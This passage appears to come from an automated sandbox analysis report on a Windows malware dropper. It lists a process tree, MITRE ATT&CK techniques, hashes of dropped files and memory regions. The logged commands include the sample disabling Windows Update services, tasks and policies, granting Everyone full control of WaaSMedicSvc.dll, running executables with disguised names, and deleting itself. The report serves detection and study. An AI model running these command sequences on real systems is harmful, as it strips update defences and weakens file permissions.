        sc stop UsoSvc
        10⤵
        Launches sc.exe
        
        PID:2716
        
        C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        10⤵
        Launches sc.exe
        
        PID:4004
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        10⤵
        Launches sc.exe
        
        PID:2136
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        10⤵
        Launches sc.exe
        
        PID:4688
        
        C:\Windows\system32\sc.exe
        
        sc config bits start= disabled
        10⤵
        Launches sc.exe
        
        PID:4184
        
        C:\Windows\system32\sc.exe
        
        sc failure bits reset= 0 actions= ""
        10⤵
        Launches sc.exe
        
        PID:3728
        
        C:\Windows\system32\sc.exe
        
        sc config dosvc start= disabled
        10⤵
        Launches sc.exe
        
        PID:1960
        
        C:\Windows\system32\sc.exe
        
        sc failure dosvc reset= 0 actions= ""
        10⤵
        Launches sc.exe
        
        PID:1556
        
        C:\Windows\system32\sc.exe
        
        sc config UsoSvc start= disabled
        10⤵
        Launches sc.exe
        
        PID:3476
        
        C:\Windows\system32\sc.exe
        
        sc failure UsoSvc reset= 0 actions= ""
        10⤵
        Launches sc.exe
        
        PID:5092
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        10⤵
        Launches sc.exe
        
        PID:1616
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        10⤵
        Launches sc.exe
        
        PID:4556
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3472
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3896
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
        10⤵
        
        PID:1380
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
        10⤵
        
        PID:4148
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
        10⤵
        
        PID:4684
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        10⤵
        
        PID:3944
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        10⤵
        
        PID:4280
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        10⤵
        
        PID:4600
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
        10⤵
        
        PID:3644
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
        10⤵
        
        PID:2784
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
        10⤵
        
        PID:4004
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
        10⤵
        
        PID:1320
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
        10⤵
        
        PID:4184
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
        10⤵
        
        PID:4176
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        10⤵
        
        PID:1600
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        9⤵
        Power Settings
        
        PID:2384
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:2012
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        10⤵
        Power Settings
        
        PID:3684
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        10⤵
        Power Settings
        
        PID:556
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        10⤵
        Power Settings
        
        PID:2488
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        10⤵
        Power Settings
        
        PID:2588
        
        C:\Windows\System32\conhost.exe
        
        C:\Windows\System32\conhost.exe
        9⤵
        
        PID:4520
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "sjrcqeodaodte"
        10⤵
        
        PID:3644
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        6⤵
        
        PID:2124
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:396
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        7⤵
        
        PID:3820
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c start C:\Users\Admin\AppData\Local\Temp\explorer.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1520
  - - C:\Users\Admin\AppData\Local\Temp\explorer.exe
      C:\Users\Admin\AppData\Local\Temp\explorer.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3192
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3900
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c start C:\Users\Admin\AppData\Local\Temp\windowshost.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4844
  - - C:\Users\Admin\AppData\Local\Temp\windowshost.exe
      C:\Users\Admin\AppData\Local\Temp\windowshost.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:5052
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\driverPerf\DDCzSbk7D28EdFKaphOM.vbe"
        5⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2272
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\driverPerf\lG0LQTEIJKvWsYHAg5CgQ5boB.bat" "
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2420
        
        C:\driverPerf\cominto.exe
        
        "C:\driverPerf\cominto.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3604

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3788

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3952

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4132

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4500

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:5116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4824

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4044

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2632

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:564

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4472

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4800

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2792

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1088

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2640

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3464

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:4064

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

Filesize
539B

MD5
8ee0f3b0e00f89f7523395bb72e9118b

SHA1
bec3fa36a1fb136551dc8157a4963ba5d2f957d4

SHA256
8c5f958972fce1812970a1f8da8ccef94a86663d42d13e296813673638a6b68b

SHA512
55f862beb42fa76ca118b2c76c92cb1e0a2586727c602645d0d4bd0e8f2120cfc2015f4333df67f3bd9f4eda8b9b399774461ab558f08312920a1489acf7a207

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9b80cd7a712469a4c45fec564313d9eb

SHA1
6125c01bc10d204ca36ad1110afe714678655f2d

SHA256
5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

SHA512
ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
6f8e1b5f685ab213f5ba9a83b54887f4

SHA1
16422de10e6f4ab5c6d21dac6b465f7b4baa3c9f

SHA256
8168b19378a2f7dee01717b018ff841fbfd09fcdd094f5eac077087592812318

SHA512
86006819987bb5c10b3d42084121ae0420d2238c78ad6a836e1b161dedf85941ea5176fd528488a7a8224121c66e62c07dd75f2a3e7d6d8b4639ceb57db2645a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
6fbb9e59502a270548bc935ae05b971d

SHA1
3c7f00c9d33538845f618202855c6b76c1eb4a59

SHA256
1a8b13f25a3623522f8701d2244eee2866916c572770ec5b3b699fcb47f6756f

SHA512
4d68a6367a98bfdb265ebb16f202626d02eb09743c7f41319b00479aa25c863aa85d088f131fe39558475691f0a536921f41bf9681ad248be79fe5b5cf0a3761

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cp0g330b.jbw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\explorer.exe

Filesize
95KB

MD5
19eab19c0d0a0b062c8eb85a94a79cc6

SHA1
3f0e2e88b9ff61e2e56edc473861cc4373af525a

SHA256
02eb6c61b19d347b9b6846285991142bb0d7515401f8fc4cf7f961be72a3c215

SHA512
550b2aa4b1892643f4a06d9df302f5685e9275ca9b302b8467fd35af806add36fe6ba6202488ea6209ee1b4a79f638d5f6e729bcf4a1b73fd38c4d4570b28223

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.exe

Filesize
2.1MB

MD5
fa0429acc4b9cfd414d24fae0e299790

SHA1
80d76038b5401080e18e6b015cbf806d9abe8589

SHA256
1440a0bb2287c84bc89c40255413dc2cab070a4382b59e9cffaa3abfe7da5489

SHA512
f6af06d7c505ab4d23a80fe616422302c5a87bfbefc81d6b0f4af36fcf86f30f865dcb4806581799a139f1b965c8d3b842125ac0b4c9a8ea59469601d9edff9e

Download Submit
C:\Users\Admin\AppData\Local\Temp\windowshost.exe

Filesize
2.8MB

MD5
51ab765a1b1f884f936db4ffc642d728

SHA1
7b7741bf5dfeaed3860bf308733490017688fa46

SHA256
816835537df73c3297cb1a0ddfe02d8f051f0fd9486ee2b1e53969b37fa87f14

SHA512
e25fdd4a7f4fd8bfe9491ec8138ed08077c2c2cd63686e6e4a59859e27294cc35d0ff99ff0b29ae3c2901c6f99e970f6d8e80435d86811398fdb41cf1bbb5234

Download Submit
C:\Windows\Tasks\dialersvc32.job

Filesize
5KB

MD5
a7acb4d32fbffa674b2246b363aae240

SHA1
f9159f8adedd48471684b94f0397761b5918d97c

SHA256
73b74f5536966f738bf969ef55dae4dd1c8a4cce3d0b37f170db536dfb40eb06

SHA512
5d07c9c1a873fde42282c72dc0055b6c9b2ce0febb73c4c1c8d3a1416d73509320222a8efb8521b6ef62cee00f63bc640fd538d9771e0df6d6be2bb186bb3afc

Download Submit
C:\Windows\Tasks\dialersvc64.job

Filesize
5KB

MD5
bb1ac9638bd48c20a624984b604d853d

SHA1
bc226df4d7f6675829b32cc37135a19f316fb7c9

SHA256
22334bc6275a197cf67387caee9df4927e3fb3e6de03d484070a9c8f0473f102

SHA512
fcea5337d05445d12bd7aba932f83ad7cdd8bf4316e0b5009aab201722fa7eee19e5b2a86b816a5d82e9bc697b43a0f3dde8082f3a9c14097c18d299fc27b863

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
3KB

MD5
90da204b95e863dc622c45cf157c5bf6

SHA1
ce345b6a1834178a4db5ed785757d5c685aafc69

SHA256
94b5cd9d7d639e6d610b1404282d6a81a2e13867bf2f1379d449d490deaaf61f

SHA512
ce2735f4b888672761358c050256cc6239e25e225bd2443f0bdd59975f1a38267cf791419d567d194c2d767afb7edb9c28cc86e4a00371303b6f7377827bc949

Download Submit
C:\driverPerf\DDCzSbk7D28EdFKaphOM.vbe

Filesize
212B

MD5
76764afd7b394cd6a9c36fa16d4c88fc

SHA1
5274a18139edf134230252c97652bfa6319b1a78

SHA256
e58f2652ec82227d6ecacc733adb6e9812fcb39283ef87aba2be65326851e50e

SHA512
3018cbc23b59527b0fe54fc17f13735dddf2e91ac188afb7abdb6fc932e2a965d725b0ffaa8b03fcc7c9f4fbd9f1ba3aafde6a2e3fe1112ccbe42fca44be01ae

Download Submit
C:\driverPerf\cominto.exe

Filesize
2.5MB

MD5
4344aa160852993fab07ae5793321886

SHA1
d33a04a9f58d6172bfaa611ceeb03b24b7c5bee5

SHA256
bbbebdfec732e0805dc3865cfa2f546120e7300d8d6d98ba71ca85026375add4

SHA512
557c569a182284d43db1342aaa64b61acae4665548fa2a7c63af05d45ae1058d070f536c6c80a859e54a051177d21cc21c86b3de4cb03d1d63c993495067d2c0

Download Submit
C:\driverPerf\lG0LQTEIJKvWsYHAg5CgQ5boB.bat

Filesize
27B

MD5
61b88edb5f6dca914ee05650653d8223

SHA1
4b61f3f21e8c981aaa73e375d090de82be46720d

SHA256
eba6d05af3adbcc9a111fe968c3a2c725221f8f7896df3490bc2509bec01cf12

SHA512
1eea3fe2ca12c0d9bc3f9a7a13a1438cdd25e35607232025477af885db7987f6cd4d03613e6be0f6c8457e9db3eaf9b394f62ed14dffa4fbb36c1c07d8e5e7b5

Download Submit
memory/376-210-0x00007FFED4850000-0x00007FFED4860000-memory.dmp

Filesize
64KB

Download
memory/376-209-0x0000026A5D470000-0x0000026A5D49A000-memory.dmp

Filesize
168KB

Download
memory/440-216-0x000002A838260000-0x000002A83828A000-memory.dmp

Filesize
168KB

Download
memory/440-217-0x00007FFED4850000-0x00007FFED4860000-memory.dmp

Filesize
64KB

Download
memory/488-189-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

Filesize
2.0MB

Download
memory/488-190-0x00007FFF134D0000-0x00007FFF1358E000-memory.dmp

Filesize
760KB

Download
memory/488-188-0x000001CB21AE0000-0x000001CB21B1C000-memory.dmp

Filesize
240KB

Download
memory/624-201-0x00007FFED4850000-0x00007FFED4860000-memory.dmp

Filesize
64KB

Download
memory/624-200-0x0000022C86B80000-0x0000022C86BAA000-memory.dmp

Filesize
168KB

Download
memory/624-199-0x0000022C86B50000-0x0000022C86B73000-memory.dmp

Filesize
140KB

Download
memory/636-178-0x0000000004170000-0x00000000044C4000-memory.dmp

Filesize
3.3MB

Download
memory/688-205-0x00007FFED4850000-0x00007FFED4860000-memory.dmp

Filesize
64KB

Download
memory/688-204-0x000001C734C30000-0x000001C734C5A000-memory.dmp

Filesize
168KB

Download
memory/964-225-0x0000022F94290000-0x0000022F942BA000-memory.dmp

Filesize
168KB

Download
memory/964-226-0x00007FFED4850000-0x00007FFED4860000-memory.dmp

Filesize
64KB

Download
memory/972-212-0x000002345D2D0000-0x000002345D2FA000-memory.dmp

Filesize
168KB

Download
memory/972-213-0x00007FFED4850000-0x00007FFED4860000-memory.dmp

Filesize
64KB

Download
memory/1080-229-0x00007FFED4850000-0x00007FFED4860000-memory.dmp

Filesize
64KB

Download
memory/1080-228-0x00000265AA260000-0x00000265AA28A000-memory.dmp

Filesize
168KB

Download
memory/1092-232-0x00007FFED4850000-0x00007FFED4860000-memory.dmp

Filesize
64KB

Download
memory/1092-231-0x000001FBF9B90000-0x000001FBF9BBA000-memory.dmp

Filesize
168KB

Download
memory/1124-135-0x00000258E5B60000-0x00000258E5B72000-memory.dmp

Filesize
72KB

Download
memory/1124-136-0x00000258801E0000-0x00000258801E6000-memory.dmp

Filesize
24KB

Download
memory/1128-234-0x000001FBCC0D0000-0x000001FBCC0FA000-memory.dmp

Filesize
168KB

Download
memory/1128-235-0x00007FFED4850000-0x00007FFED4860000-memory.dmp

Filesize
64KB

Download
memory/1148-237-0x000001C122D70000-0x000001C122D9A000-memory.dmp

Filesize
168KB

Download
memory/1148-238-0x00007FFED4850000-0x00007FFED4860000-memory.dmp

Filesize
64KB

Download
memory/1272-240-0x00000276081D0000-0x00000276081FA000-memory.dmp

Filesize
168KB

Download
memory/1272-241-0x00007FFED4850000-0x00007FFED4860000-memory.dmp

Filesize
64KB

Download
memory/1308-245-0x000001709CB70000-0x000001709CB9A000-memory.dmp

Filesize
168KB

Download
memory/1308-246-0x00007FFED4850000-0x00007FFED4860000-memory.dmp

Filesize
64KB

Download
memory/1388-248-0x000002A419FC0000-0x000002A419FEA000-memory.dmp

Filesize
168KB

Download
memory/1552-83-0x00000000025C0000-0x00000000025CE000-memory.dmp

Filesize
56KB

Download
memory/1552-78-0x0000000000110000-0x000000000039E000-memory.dmp

Filesize
2.6MB

Download
memory/2164-156-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/2424-56-0x000000006F8B0000-0x000000006F8FC000-memory.dmp

Filesize
304KB

Download
memory/2424-81-0x0000000007340000-0x000000000735A000-memory.dmp

Filesize
104KB

Download
memory/2424-72-0x00000000072A0000-0x0000000007336000-memory.dmp

Filesize
600KB

Download
memory/2424-71-0x0000000007080000-0x000000000708A000-memory.dmp

Filesize
40KB

Download
memory/2424-13-0x0000000002720000-0x0000000002756000-memory.dmp

Filesize
216KB

Download
memory/2424-17-0x0000000004FE0000-0x0000000005608000-memory.dmp

Filesize
6.2MB

Download
memory/2424-28-0x0000000004ED0000-0x0000000004F36000-memory.dmp

Filesize
408KB

Download
memory/2424-29-0x0000000004F40000-0x0000000004FA6000-memory.dmp

Filesize
408KB

Download
memory/2424-26-0x0000000004D30000-0x0000000004D52000-memory.dmp

Filesize
136KB

Download
memory/2424-32-0x0000000005690000-0x00000000059E4000-memory.dmp

Filesize
3.3MB

Download
memory/2424-68-0x0000000006F00000-0x0000000006FA3000-memory.dmp

Filesize
652KB

Download
memory/2424-53-0x0000000005CF0000-0x0000000005D0E000-memory.dmp

Filesize
120KB

Download
memory/2424-54-0x0000000006CC0000-0x0000000006CF2000-memory.dmp

Filesize
200KB

Download
memory/2424-66-0x00000000062B0000-0x00000000062CE000-memory.dmp

Filesize
120KB

Download
memory/2424-79-0x0000000007250000-0x000000000725E000-memory.dmp

Filesize
56KB

Download
memory/2424-82-0x0000000007290000-0x0000000007298000-memory.dmp

Filesize
32KB

Download
memory/2424-80-0x0000000007260000-0x0000000007274000-memory.dmp

Filesize
80KB

Download
memory/2424-74-0x0000000007210000-0x0000000007221000-memory.dmp

Filesize
68KB

Download
memory/3096-70-0x0000000007880000-0x0000000007912000-memory.dmp

Filesize
584KB

Download
memory/3096-55-0x0000000007D00000-0x000000000837A000-memory.dmp

Filesize
6.5MB

Download
memory/3096-69-0x0000000008930000-0x0000000008ED4000-memory.dmp

Filesize
5.6MB

Download
memory/3096-67-0x00000000069C0000-0x00000000069DA000-memory.dmp

Filesize
104KB

Download
memory/3192-31-0x0000000005680000-0x00000000056CC000-memory.dmp

Filesize
304KB

Download
memory/3192-16-0x0000000000D60000-0x0000000000D7E000-memory.dmp

Filesize
120KB

Download
memory/3192-24-0x0000000005D50000-0x0000000006368000-memory.dmp

Filesize
6.1MB

Download
memory/3192-25-0x00000000055E0000-0x00000000055F2000-memory.dmp

Filesize
72KB

Download
memory/3192-27-0x0000000005640000-0x000000000567C000-memory.dmp

Filesize
240KB

Download
memory/3192-51-0x00000000058F0000-0x00000000059FA000-memory.dmp

Filesize
1.0MB

Download
memory/3456-193-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

Filesize
2.0MB

Download
memory/3456-191-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/3456-192-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/3456-197-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/3456-194-0x00007FFF134D0000-0x00007FFF1358E000-memory.dmp

Filesize
760KB

Download
memory/3632-101-0x000000006F8B0000-0x000000006F8FC000-memory.dmp

Filesize
304KB

Download
memory/3644-1019-0x00000297AC350000-0x00000297AC356000-memory.dmp

Filesize
24KB

Download
memory/4244-137-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/4244-138-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/4348-117-0x0000025548210000-0x0000025548232000-memory.dmp

Filesize
136KB

Download
memory/4504-97-0x000001D2BEEC0000-0x000001D2BF0E1000-memory.dmp

Filesize
2.1MB

Download
memory/4504-100-0x000001D2D9AA0000-0x000001D2D9CC2000-memory.dmp

Filesize
2.1MB

Download